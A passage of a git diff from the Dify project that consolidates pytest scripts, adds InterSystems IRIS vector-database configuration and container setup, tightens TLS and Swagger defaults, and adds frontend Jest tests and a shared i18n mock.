"$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." 
+ +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ "${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." 
- -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow diff --git a/docker/.env.example b/docker/.env.example index 04088b72a8..94b9d180b0 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. +# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ @@ -1214,7 +1229,7 @@ NGINX_SSL_PORT=443 # and modify the env vars below accordingly. 
NGINX_SSL_CERT_FILENAME=dify.crt NGINX_SSL_CERT_KEY_FILENAME=dify.key -NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3 +NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3 # Nginx performance tuning NGINX_WORKER_PROCESSES=auto @@ -1406,7 +1421,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) @@ -1433,5 +1448,16 @@ WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration TENANT_ISOLATED_TASK_CONCURRENCY=1 +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + # The API key of amplitude -AMPLITUDE_API_KEY= +AMPLITUDE_API_KEY= \ No newline at end of file diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index b12d06ca97..4f6194b9e4 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -414,7 +414,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -648,6 +648,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 825f0650c8..5c53788234 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,6 +361,19 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: 
${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} @@ -515,7 +528,7 @@ x-shared-env: &shared-api-worker-env NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443} NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -618,7 +631,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} @@ -635,6 +648,12 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} services: @@ -1052,7 +1071,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. 
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -1286,6 +1305,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! -f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." + + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") diff --git a/.cursorrules b/web/AGENTS.md similarity index 61% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..7362cd51db 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,6 +1,5 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. 
diff --git a/web/CLAUDE.md b/web/CLAUDE.md
new file mode 120000
index 0000000000..47dc3e3d86
--- /dev/null
+++ b/web/CLAUDE.md
@@ -0,0 +1 @@
+AGENTS.md
\ No newline at end of file
diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts
new file mode 100644
index 0000000000..1e3f58927e
--- /dev/null
+++ b/web/__mocks__/react-i18next.ts
@@ -0,0 +1,40 @@
+/**
+ * Shared mock for react-i18next
+ *
+ * Jest automatically uses this mock when react-i18next is imported in tests.
+ * The default behavior returns the translation key as-is, which is suitable
+ * for most test scenarios.
+ *
+ * For tests that need custom translations, you can override with jest.mock():
+ *
+ * @example
+ * jest.mock('react-i18next', () => ({
+ *   useTranslation: () => ({
+ *     t: (key: string) => {
+ *       if (key === 'some.key') return 'Custom translation'
+ *       return key
+ *     },
+ *   }),
+ * }))
+ */
+
+export const useTranslation = () => ({
+  t: (key: string, options?: Record<string, any>) => {
+    if (options?.returnObjects)
+      return [`${key}-feature-1`, `${key}-feature-2`]
+    if (options)
+      return `${key}:${JSON.stringify(options)}`
+    return key
+  },
+  i18n: {
+    language: 'en',
+    changeLanguage: jest.fn(),
+  },
+})
+
+export const Trans = ({ children }: { children?: React.ReactNode }) => children
+
+export const initReactI18next = {
+  type: '3rdParty',
+  init: jest.fn(),
+}
diff --git a/web/__tests__/embedded-user-id-auth.test.tsx b/web/__tests__/embedded-user-id-auth.test.tsx
index 5c3c3c943f..9d6734b120 100644
--- a/web/__tests__/embedded-user-id-auth.test.tsx
+++ b/web/__tests__/embedded-user-id-auth.test.tsx
@@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react'
 import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth'
 import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page'
 
-jest.mock('react-i18next', () => ({
-  useTranslation: () => ({
-    t: (key: string) => key,
-  }),
-}))
-
 const replaceMock = jest.fn()
 const backMock = jest.fn()
 
diff --git a/web/__tests__/goto-anything/command-selector.test.tsx b/web/__tests__/goto-anything/command-selector.test.tsx
index 6d4e045d49..e502c533bb 100644
--- a/web/__tests__/goto-anything/command-selector.test.tsx
+++ b/web/__tests__/goto-anything/command-selector.test.tsx
@@ -4,12 +4,6 @@ import '@testing-library/jest-dom'
 import CommandSelector from '../../app/components/goto-anything/command-selector'
 import type { ActionItem } from '../../app/components/goto-anything/actions/types'
 
-jest.mock('react-i18next', () => ({
-  useTranslation: () => ({
-    t: (key: string) => key,
-  }),
-}))
-
 jest.mock('cmdk', () => ({
   Command: {
     Group: ({ children, className }: any) =>
      <div className={className}>{children}</div>
, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx index b1e915b2bf..374dbff203 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx @@ -3,13 +3,6 @@ import { render } from '@testing-library/react' import '@testing-library/jest-dom' import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing' -// Mock dependencies to isolate the SVG rendering issue -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('SVG Attribute Error Reproduction', () => { // Capture console errors const originalError = console.error diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..356f813afc --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
<div data-testid='annotation-full' />
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { 
name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({

- <Checkbox checked={isCreateNext} onCheck={() => setIsCreateNext(!isCreateNext)} />
+ <Checkbox id='create-next-checkbox' checked={isCreateNext} onCheck={() => setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
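The spec for this modal queries `screen.getByTestId('checkbox-create-next-checkbox')`. That lookup only resolves if the base `Checkbox` derives a `data-testid` from the `id` it receives here — an assumption about the base component, which this diff does not include. A minimal sketch of that mapping:

```typescript
// Minimal sketch of the assumed id -> data-testid convention. The real
// derivation lives in the base Checkbox component, which this diff does
// not show; treat this helper as illustrative, not the actual source.
const checkboxTestId = (id?: string): string | undefined =>
  id ? `checkbox-${id}` : undefined

// checkboxTestId('create-next-checkbox') === 'checkbox-create-next-checkbox',
// which is exactly what the spec queries via getByTestId.
```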
